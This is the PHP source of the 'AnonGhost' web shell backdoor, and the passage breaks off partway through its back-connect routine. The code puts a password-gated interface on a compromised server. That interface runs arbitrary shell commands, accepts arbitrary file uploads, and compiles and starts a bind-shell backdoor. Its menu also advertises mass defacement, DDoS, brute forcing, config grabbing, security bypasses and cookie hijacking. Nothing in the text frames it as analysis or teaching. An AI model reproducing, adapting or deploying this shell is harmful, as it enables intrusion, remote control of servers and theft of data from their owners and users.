AnonGhost shell Backdoor

1. <?php
2.  
3. error_reporting(0); $password = "86e10d39adfd58801398da1aae3c847f"; $cookiename = "virusa";if((isset($_POST['mlebu'])) or ($_POST['pass'])){if(strlen($password) == 32){$_POST['pass'] = md5($_POST['pass']);}if($_POST['pass'] == $password){setcookie($cookiename, $_POST['pass'], time()+3600);}hezni();}if(!empty($password) && !isset($_COOKIE[$cookiename]) or ($_COOKIE[$cookiename] != $password)){mlebu();die();}
4. echo '<center><a href="?ag"><img src="http://i952.photobucket.com/albums/ae1/virusaworm/ag/agshe00_zps4061a864.png"></center></a>';
5. $bencong = '<center>'.php_uname("a").'<br><br><ul id="menu"><li><a href="?ag">Home</a></li> <li><a href="?back">Connect</a></li> <li><a href="?agzh">Mirror</a></li> <li><a href="?findwr">Find Dir</a></li> <li><a href="?bbase">Base_Dir</a></li> <li><a href="?ddose">DDos</a></li> <li><a href="?agsky">Skype</a></li> <li><a href="?hps">Logs</a></li> <li><a href="?blhost">BlueHost</a></li> <li><a href="?hostg">HostGator</a></li> <li><a href="?agovh">OVH</a></li> <li><a href="?apngi">Apache</a></li> <li><a href="?agcp">CPanel</a></li> <li><a href="?agdom">Domains</a></li> <li><a href="?cmsde">CMS Detect</a></li> <li><a href="?cuki">Hijack</a></li> <li><a href="?dbne">MySql</a></li> <li><a href="?Done">Info</a></li> <li><a href="?tule">Hide</a></li> <li><a href="?kill">Kill</a></li></ul><ul></ul><ul id="menu"><li><a href="#">IIS 7.5</a><ul class="sub-menu"><li><a href="?aghtt">IIS httpd</a></li><li><a href="?porte">Port Exploit</a></li></ul></li> <li><a href="?string">Script Encode</a></li><li><a href="#">vBulletin</a><ul class="sub-menu"><li><a href="?shellinj">Shell Injecter</a></li><li><a href="?vbul">vBulletin BruteForce</a></li><li><a href="?vbgen">VBulletin Pass Generator</a></li><li><a href="?vbcha">VBulletin Index Changer</a></li></ul></li> <li><a href="#">CGI Telnet</a><ul class="sub-menu"><li><a href="?cgi">CGI Telnet v1</a></li><li><a href="?cgi14">CGI Telnet v1.4</a></li></ul></li> <li><a href="#">Symlink</a><ul class="sub-menu"><li><a href="?bforb">Bypass Forbid</a></li><li><a href="?sym">Symlink Server</a></li><li><a href="?bypa">Bypass 2013</a></li><li><a href="?suphp">suPHP Symlink</a></li><li><a href="?suexec">suEXEC Bypass</a></li><li><a href="?config">Config Grabber</a></li><li><a href="?sima">Symlink Manual</a></li><li><a href="?ensym">Enable Symlink</a></li><li><a href="?agrit">Source File Bypass</a></li><li><a href="?agritf">Read File Bypass</a></li></ul></li> <li><a href="#">LiteSpeed</a><ul class="sub-menu"><li><a href="?aglts">Litespeed Bypass</a></li><li><a href="?agls">Litespeed command</a></li></ul></li> <li><a href="#">Command</a><ul class="sub-menu"><li><a href="?cm">Command Shell</a></li><li><a href="?cmby">Command Bypass</a></li></ul></li> <li><a href="#">Safe Mode</a><ul class="sub-menu"><li><a href="?obd">Open Base_Dir Bypass</a></li><li><a href="?cloudf">CloudFare Bypass</a></li><li><a href="?modse">Bypass Mod_Sec</a></li><li><a href="?mni">Method Not implemented</a></li><li><a href="?filter">Filter Users</a></li><li><a href="?agbfu">Bypass Functions</a></li><li><a href="?agsm">Bypass SafeMode</a></li><li><a href="?agbpe">Bypass Perl Security</a></li><li><a href="?agpyt">Bypass Python Security</a></li><li><a href="?agup">Uploader Bypass</a></li><li><a href="?agdon">Download Remote</a></li></ul></li> <li><a href="#">Brute Force</a><ul class="sub-menu"><li><a href="?agbf">B- Force Tools</a></li><li><a href="?agmyp">B- Force PhpMyAdmin</a><li><a href="?agftp">B- Force FTP</a></li></ul></li> <li><a href="#">Deface</a><ul class="sub-menu"><li><a href="?massdef">Mass Deface</a></li><li><a href="?mass">WP/JM Deface</a></li><li><a href="?cpdef">Cpanel Deface</a></li></ul></li> <li><a href="#">WHMCS</a><ul class="sub-menu"><li><a href="?whkill">Whmcs Kill</a></li><li><a href="?whex">Whmcs Auto Exp</a></li><li><a href="?whme">WHMCS Conf</a></li></ul></li> <li><a href="#">Joomla Exp</a><ul class="sub-menu"><li><a href="?0jo">Joomla com_inst</a></li><li><a href="?jpc">Joomla Cracker</a></li><li><a href="?joic">Joomla Index Changer</a></li></ul></li> <li><a href="#">Wordpress</a><ul class="sub-menu"><li><a href="?wpne">Wordpress Brute</a></li><li><a href="?getuser">Get Username</a></li><li><a href="?wrdkiller">Wordpress Kill</a></li><li><a href="?wpdisp">Wordpress Disclosure Path Vuln</a></li></ul></li> <li><a href="#">Mailer</a><ul class="sub-menu"><li><a href="?agma">Mailer</a></li><li><a href="?agmbom">Mail Boomb</a></li><li><a href="?agmc">Mail Crack</a></li><li><a href="?exmail">Extract Emails</a></li></ul></li> <li><a href="#">MD5 En/Dec</a><ul class="sub-menu"><li><a href="?mdec">MD5 Dec</a></li><li><a href="?mden">MD5 Gen</a></li></ul></li></ul>';
6. function mlebu() { $uname = php_uname("a"); echo "<center>".$uname."<br><br><br><img src='http://i952.photobucket.com/albums/ae1/virusaworm/ag/agne_zps5e42fcf5.png'><br><br> <form method='POST'><input type='password' maxlength='32' name='pass'>&nbsp;&nbsp;<input type='submit' value='Login' name='login'></form></center><style>*{font-family:Courier New;} div{align:center;-moz-border-radius:3px;border-radius:3px;border:2px dashed #58FAF4;margin:4px 0 6px;padding:8px 6px;} body{background:#101010;background-image: url(http://i952.photobucket.com/albums/ae1/virusaworm/ag/fond2_zpsd035f58f.jpg);font-size:14px;color:#58FAF4;font-weight:400;} a{text-decoration:none;} a:hover{color:#999999;} </style>";} function hezni() {header("Location: ".basename(__FILE__)."?ag");} function exe($cmd){ if(function_exists('system')) {@ob_start();@system($cmd); $buff = @ob_get_contents(); $buff = @ob_get_contents(); @ob_end_clean(); return $buff; } elseif(function_exists('exec')) {@exec($cmd,$results); $buff = ""; foreach($results as $result){ $buff .= $result; } return $buff;} elseif(function_exists('passthru')){@ob_start();@passthru($cmd); $buff = @ob_get_contents();@ob_end_clean(); return $buff;} elseif(function_exists('shell_exec')){ $buff = @shell_exec($cmd); return $buff;}} function which($pr){ $path = exe("which $pr"); if(!empty($path)) {return trim($path);} else {return trim($pr);}} if(@ini_get('disable_functions')) $kadangan = @ini_get('disable_functions'); else $kadangan = "None :v"; if(isset($_GET['ag'])) { echo $bencong.'<img src="http://i952.photobucket.com/albums/ae1/virusaworm/ag/agne_zps5e42fcf5.png">'; echo '<br><br><center><br><br><form method="post" enctype="multipart/form-data"><input type="file" name="file"><input type="submit" name="upload" value="Submit"></form>'; if($_POST['upload']) { $o = copy($_FILES['file']['tmp_name'],$_FILES['file']['name']); if($o) echo "<br><br>upload sukses.. <img src='http://l.yimg.com/us.yimg.com/i/mesg/emoticons7/41.gif'>"; else echo "<br><br>aseeeemmm ? , ora iso upload <img src='http://l.yimg.com/us.yimg.com/i/mesg/emoticons7/68.gif'> "; } echo '</center>';} elseif(isset($_GET['back'])){echo $bencong."<center><p class='font-effect-shadow-multiple' style=font-family:Ubuntu;font-size:25px;color:#58FAF4;><b>AnonGhost Back connect</b></p>"; if (isset($_POST['bind']) && !empty($_POST['port']) && !empty($_POST['bind_pass']) && ($_POST['use'] == 'C')) { $port = trim($_POST['port']); $passwrd = trim($_POST['bind_pass']); tulis("bdc.c",$port_bind_bd_c); exe("gcc -o bdc bdc.c"); exe("chmod 777 bdc"); @unlink("bdc.c"); exe("./bdc ".$port." ".$passwrd." &"); $scan = exe("ps aux"); if(eregi("./bdc $por",$scan)){ $msg = "<p>Process found running, backdoor setup successfully.</p>"; } else { $msg = "<p>Process not found running, backdoor not setup successfully.</p>"; } }